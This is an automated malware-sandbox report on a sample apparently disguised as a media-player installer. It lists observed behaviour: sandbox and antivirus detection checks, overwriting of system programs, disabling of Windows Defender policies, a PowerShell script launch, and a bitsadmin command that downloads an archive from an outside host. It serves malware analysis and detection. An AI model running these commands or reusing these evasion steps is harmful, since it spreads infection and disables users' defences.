NtAllocateVirtualMemory May 18, 2021, 10:05 a.m.	process_identifier: 1976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b74000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2021, 10:05 a.m.	process_identifier: 1976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b75000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2021, 10:05 a.m.	process_identifier: 1976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b76000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2021, 10:05 a.m.	process_identifier: 1976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b77000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2021, 10:05 a.m.	process_identifier: 1976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b78000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2021, 10:05 a.m.	process_identifier: 1976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b79000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2021, 10:05 a.m.	process_identifier: 1976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b7a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2021, 10:05 a.m.	process_identifier: 1976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b7b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2021, 10:05 a.m.	process_identifier: 1976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b7c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2021, 10:05 a.m.	process_identifier: 1976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b7d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2021, 10:05 a.m.	process_identifier: 1976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b7e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2021, 10:05 a.m.	process_identifier: 1976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b7f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2021, 10:05 a.m.	process_identifier: 1976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05020000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2021, 10:05 a.m.	process_identifier: 1976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05021000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2021, 10:05 a.m.	process_identifier: 1976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05022000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2021, 10:05 a.m.	process_identifier: 1976 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05023000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (2 events)

Time & API	Arguments	Status	Return	Repeated
GetDiskFreeSpaceExW May 18, 2021, 9:58 a.m.	total_number_of_free_bytes: 0 free_bytes_available: 13672865792 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Explorer total_number_of_bytes: 0	1	1	0
GetDiskFreeSpaceExW May 18, 2021, 9:59 a.m.	total_number_of_free_bytes: 13624987648 free_bytes_available: 13624987648 root_path: C:\ total_number_of_bytes: 34252779520	1	1	0

Creates executable files on the filesystem (50 out of 142 events)

file	C:\Program Files (x86)\lighteningplayer\plugins\lua\liblua_plugin.dll
file	C:\Program Files (x86)\lighteningplayer\plugins\demux\libsmf_plugin.dll
file	C:\Program Files (x86)\lighteningplayer\plugins\video_splitter\libclone_plugin.dll
file	C:\Program Files (x86)\lighteningplayer\plugins\misc\libaddonsvorepository_plugin.dll
file	C:\Program Files (x86)\lighteningplayer\plugins\demux\libcaf_plugin.dll
file	C:\Program Files (x86)\lighteningplayer\plugins\demux\libavi_plugin.dll
file	C:\Program Files (x86)\lighteningplayer\lighteningplayer.exe
file	C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\System.dll
file	C:\Program Files (x86)\lighteningplayer\libssp-0.dll
file	C:\Program Files (x86)\lighteningplayer\plugins\demux\libps_plugin.dll
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Lightening Media Player.lnk
file	C:\Program Files (x86)\lighteningplayer\plugins\text_renderer\libfreetype_plugin.dll
file	C:\Program Files\temp_files\data.dll
file	C:\Program Files (x86)\lighteningplayer\plugins\logger\libconsole_logger_plugin.dll
file	C:\Program Files (x86)\lighteningplayer\plugins\d3d11\libdirect3d11_filters_plugin.dll
file	C:\Program Files (x86)\lighteningplayer\plugins\demux\libvc1_plugin.dll
file	C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libafile_plugin.dll
file	C:\Program Files (x86)\lighteningplayer\libvlc.dll
file	C:\Program Files (x86)\lighteningplayer\plugins\demux\libdiracsys_plugin.dll
file	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpegvideo_plugin.dll
file	C:\Program Files (x86)\lighteningplayer\plugins\access\libvdr_plugin.dll
file	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpegaudio_plugin.dll
file	C:\Program Files (x86)\lighteningplayer\plugins\video_splitter\libpanoramix_plugin.dll
file	C:\Program Files (x86)\lighteningplayer\plugins\demux\libwav_plugin.dll
file	C:\Program Files (x86)\lighteningplayer\plugins\demux\libnsc_plugin.dll
file	C:\Program Files (x86)\lighteningplayer\plugins\demux\libsubtitle_plugin.dll
file	C:\Program Files (x86)\lighteningplayer\plugins\demux\libreal_plugin.dll
file	C:\Program Files (x86)\lighteningplayer\plugins\access\libfilesystem_plugin.dll
file	C:\Program Files (x86)\lighteningplayer\plugins\demux\libmjpeg_plugin.dll
file	C:\Program Files (x86)\lighteningplayer\plugins\demux\libes_plugin.dll
file	C:\Program Files (x86)\lighteningplayer\lua\http\js\ui.js
file	C:\Program Files (x86)\lighteningplayer\plugins\access\libsmb_plugin.dll
file	C:\Program Files (x86)\lighteningplayer\plugins\access\libsdp_plugin.dll
file	C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libwaveout_plugin.dll
file	C:\Program Files (x86)\lighteningplayer\plugins\demux\libtta_plugin.dll
file	C:\Program Files (x86)\lighteningplayer\plugins\access\libcdda_plugin.dll
file	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_dts_plugin.dll
file	C:\Program Files (x86)\lighteningplayer\plugins\spu\libmarq_plugin.dll
file	C:\Program Files (x86)\lighteningplayer\plugins\gui\libqt_plugin.dll
file	C:\Program Files (x86)\lighteningplayer\plugins\meta_engine\libtaglib_plugin.dll
file	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_vc1_plugin.dll
file	C:\Program Files (x86)\lighteningplayer\plugins\misc\libstats_plugin.dll
file	C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libmmdevice_plugin.dll
file	C:\Program Files (x86)\lighteningplayer\plugins\meta_engine\libfolder_plugin.dll
file	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mlp_plugin.dll
file	C:\Program Files (x86)\lighteningplayer\plugins\demux\libgme_plugin.dll
file	C:\Program Files (x86)\lighteningplayer\plugins\access\librtp_plugin.dll
file	C:\Program Files (x86)\lighteningplayer\plugins\demux\librawaud_plugin.dll
file	C:\Program Files (x86)\lighteningplayer\plugins\demux\libmpc_plugin.dll
file	C:\Program Files (x86)\lighteningplayer\plugins\access\libhttp_plugin.dll

Creates hidden or system file (1 event)

Time & API	Arguments	Status	Return	Repeated
SetFileAttributesW May 18, 2021, 10:07 a.m.	file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: C:\Windows\System32\GroupPolicy filepath: C:\Windows\System32\GroupPolicy	1	1	0

Creates a shortcut to an executable file (18 events)

file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EditPlus.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sidebar.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lightening Media Player.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Fax and Scan.lnk
file	C:\Users\test22\Desktop\Lightening Media Player.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\한컴오피스 한글 2010.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Chrome.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Windows Update.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Anytime Upgrade.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Default Programs.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\한컴 사전.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Lightening Media Player.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Lightening Media Player.lnk
file	C:\Program Files (x86)\lighteningplayer\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Lightening Media Player.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\XPS Viewer.lnk

Creates a suspicious process (1 event)

cmdline

powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1"

Drops an executable to the user AppData folder (3 events)

file	C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\System.dll
file	C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\Dialer.dll
file	C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\nsExec.dll

Executes one or more WMI queries (1 event)

wmi	select * from Win32_processor

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (12 events)

Time & API	Arguments	Status	Return
Process32NextW May 18, 2021, 10:05 a.m.	snapshot_handle: 0x000001e0 process_name: audiodg.exe process_identifier: 892	1	1
Process32NextW May 18, 2021, 10:05 a.m.	snapshot_handle: 0x000001e0 process_name: WmiPrvSE.exe process_identifier: 1916	1	1
Process32NextW May 18, 2021, 10:05 a.m.	snapshot_handle: 0x000001e0 process_name: pw.exe process_identifier: 2816	1	1
Process32NextW May 18, 2021, 10:05 a.m.	snapshot_handle: 0x000001e0 process_name: SearchIndexer.exe process_identifier: 2940	1	1
Process32NextW May 18, 2021, 10:05 a.m.	snapshot_handle: 0x000001e0 process_name: SearchProtocolHost.exe process_identifier: 1480	1	1
Process32NextW May 18, 2021, 10:05 a.m.	snapshot_handle: 0x000001e0 process_name: SearchFilterHost.exe process_identifier: 3040	1	1
Process32NextW May 18, 2021, 10:05 a.m.	snapshot_handle: 0x000001e0 process_name: SearchProtocolHost.exe process_identifier: 2120	1	1
Process32NextW May 18, 2021, 10:05 a.m.	snapshot_handle: 0x000001e0 process_name: mobsync.exe process_identifier: 2140	1	1
Process32NextW May 18, 2021, 10:05 a.m.	snapshot_handle: 0x000001e0 process_name: pw.exe process_identifier: 2368	1	1
Process32NextW May 18, 2021, 10:05 a.m.	snapshot_handle: 0x000001e0 process_name: taskhost.exe process_identifier: 752	1	1
Process32NextW May 18, 2021, 10:05 a.m.	snapshot_handle: 0x000001e0 process_name: SunLabsPlayer.exe process_identifier: 1108	1	1
Process32NextW May 18, 2021, 10:05 a.m.	snapshot_handle: 0x000001e8 process_name: 퀀绽(褺犽 process_identifier: 2686916		0

The binary likely contains encrypted or compressed data indicative of a packer (1 event)

section

{u'size_of_data': u'0x00006a00', u'virtual_address': u'0x0000b000', u'entropy': 7.299408808107717, u'name': u'.rdata', u'virtual_size': u'0x000069d8'}

entropy

7.29940880811

description

A section with a high entropy has been found

Checks for the Locally Unique Identifier on the system for a suspicious privilege (17 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW May 18, 2021, 9:59 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW May 18, 2021, 9:59 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW May 18, 2021, 10:05 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW May 18, 2021, 10:05 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW May 18, 2021, 10:05 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW May 18, 2021, 10:05 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW May 18, 2021, 10:05 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW May 18, 2021, 10:05 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW May 18, 2021, 10:05 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW May 18, 2021, 10:07 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW May 18, 2021, 10:07 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW May 18, 2021, 10:07 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW May 18, 2021, 10:07 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW May 18, 2021, 10:07 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW May 18, 2021, 10:07 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW May 18, 2021, 10:07 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW May 18, 2021, 10:07 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Expresses interest in specific running processes (1 event)

process

sunlabsplayer.exe

Uses Windows utilities for basic Windows functionality (1 event)

cmdline

powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\test22\AppData\Local\Temp\nse65F8.tmp\tempfile.ps1"

Executes one or more WMI queries which can be used to identify virtual machines (1 event)

wmi	select * from Win32_processor

Attempts to identify installed AV products by registry key (5 events)

registry	HKEY_LOCAL_MACHINE\HKEY_LOCAL_MACHINE\SOFTWARE\ESET
registry	HKEY_CURRENT_USER\SOFTWARE\ESET
registry	HKEY_CURRENT_USER\HKEY_CURRENT_USER\SOFTWARE\ESET
registry	HKEY_LOCAL_MACHINE\SOFTWARE\ESET
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Paths

Uses suspicious command line tools or Windows utilities (1 event)

cmdline

"bitsadmin" /Transfer helper http://moonlabmediacompany.com/data/data.7z C:\zip.7z

The process powershell.exe wrote an executable file to disk (20 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

Disables Windows Security features (2 events)

description	attempts to modify windows defender policies				registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware
description	attempts to modify windows defender policies				registry	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{0504A941-FA89-4072-957C-5A1622CCE09F}Machine\Software\Policies\Microsoft\Windows Defender\DisableAntiSpyware

SunLabsPlayer.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All